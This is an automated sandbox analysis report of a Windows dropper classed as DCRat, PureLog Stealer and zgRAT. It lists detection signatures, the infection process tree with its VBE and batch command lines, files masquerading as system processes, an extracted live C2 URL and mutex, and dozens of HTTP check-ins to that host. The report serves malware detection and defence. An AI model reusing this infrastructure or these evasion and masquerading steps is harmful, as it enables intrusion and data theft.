Windows Analysis Report
HcEvQKWAu2.exe

Overview

General Information

Sample name: HcEvQKWAu2.exe (renamed because original name is a hash value)
Original sample name: 3a92479aa98e55499bfa33bc2ea35b64.exe
Analysis ID: 1549036
MD5: 3a92479aa98e55499bfa33bc2ea35b64
SHA1: 2645ee34fe180b3c775fec79729f5ecee1dab95f
SHA256: cc8ffd463272f8abfb56f7f6c7a83ade8137e8df4c8cf39926469bf54efd1f71
Tags: DCRat, exe, user-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HcEvQKWAu2.exe (PID: 8 cmdline: "C:\Users\user\Desktop\HcEvQKWAu2.exe" MD5: 3A92479AA98E55499BFA33BC2EA35B64)
    • wscript.exe (PID: 5296 cmdline: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontReviewsavesinto.exe (PID: 1648 cmdline: "C:\ComponentSavesinto/fontReviewsavesinto.exe" MD5: 5B7391CD38F6218CD0E5C8F3899AB4DD)
          • cmd.exe (PID: 6960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7216 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7232 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • fontReviewsavesinto.exe (PID: 7392 cmdline: "C:\ComponentSavesinto\fontReviewsavesinto.exe" MD5: 5B7391CD38F6218CD0E5C8F3899AB4DD)
  • cleanup
{"C2 url": "http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral", "MUTEX": "DCR_MUTEX-CaL7zfwyS1Lcmm7w4GYk"}
Source | Rule | Description | Author | Strings
HcEvQKWAu2.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
HcEvQKWAu2.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\ComponentSavesinto\WmiPrvSE.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ComponentSavesinto\WmiPrvSE.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ComponentSavesinto\fontReviewsavesinto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ComponentSavesinto\fontReviewsavesinto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Recovery\Registry.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(7 more entries not shown)

Source | Rule | Description | Author | Strings
00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(4 more entries not shown)

Source | Rule | Description | Author | Strings
0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
11.0.fontReviewsavesinto.exe.610000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
11.0.fontReviewsavesinto.exe.610000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.HcEvQKWAu2.exe.66ce702.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
(5 more entries not shown)

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\ComponentSavesinto\fontReviewsavesinto.exe, ProcessId: 1648, TargetFilename: C:\ComponentSavesinto\WmiPrvSE.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\HcEvQKWAu2.exe", ParentImage: C:\Users\user\Desktop\HcEvQKWAu2.exe, ParentProcessId: 8, ParentProcessName: HcEvQKWAu2.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe" , ProcessId: 5296, ProcessName: wscript.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T08:12:16.386372+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.7 | 49720 | TCP
2024-11-05T08:12:55.057943+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.7 | 49975 | TCP
2024-11-05T08:12:18.601542+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49745 | 37.44.238.250 | 80 | TCP


AV Detection

Source: HcEvQKWAu2.exe, Avira: detected
Source: http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php, Avira URL Cloud: Label: malware
Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\Registry.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\ComponentSavesinto\WmiPrvSE.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"C2 url": "http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral", "MUTEX": "DCR_MUTEX-CaL7zfwyS1Lcmm7w4GYk"}
Source: C:\ComponentSavesinto\WmiPrvSE.exe, ReversingLabs: Detection: 87%
Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, ReversingLabs: Detection: 87%
Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exe, ReversingLabs: Detection: 87%
Source: C:\Recovery\Registry.exe, ReversingLabs: Detection: 87%
Source: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exe, ReversingLabs: Detection: 87%
Source: HcEvQKWAu2.exe, ReversingLabs: Detection: 63%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Joe Sandbox ML: detected
Source: C:\ComponentSavesinto\kRoaRVhtzmWNJQRz.exe, Joe Sandbox ML: detected
Source: C:\Recovery\Registry.exe, Joe Sandbox ML: detected
Source: C:\ComponentSavesinto\WmiPrvSE.exe, Joe Sandbox ML: detected
Source: HcEvQKWAu2.exe, Joe Sandbox ML: detected
Source: HcEvQKWAu2.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HcEvQKWAu2.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HcEvQKWAu2.exe
Source: C:\Users\user\Desktop\HcEvQKWAu2.exe, Code function: 0_2_00F8A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F8A69B
Source: C:\Users\user\Desktop\HcEvQKWAu2.exe, Code function: 0_2_00F9C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F9C220
Source: C:\Users\user\Desktop\HcEvQKWAu2.exe, Code function: 0_2_00FAB348 FindFirstFileExA,0_2_00FAB348

Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49745 -> 37.44.238.250:80
Source: Joe Sandbox View, IP Address: 37.44.238.250
Source: Joe Sandbox View, ASN Name: HARMONYHOSTING-ASFR
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49720
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49975
Source: global traffic, HTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1, Content-Type: application/x-www-form-urlencoded, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0, Host: 427176cm.nyashkoon.in, Content-Length: 336, Expect: 100-continue, Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
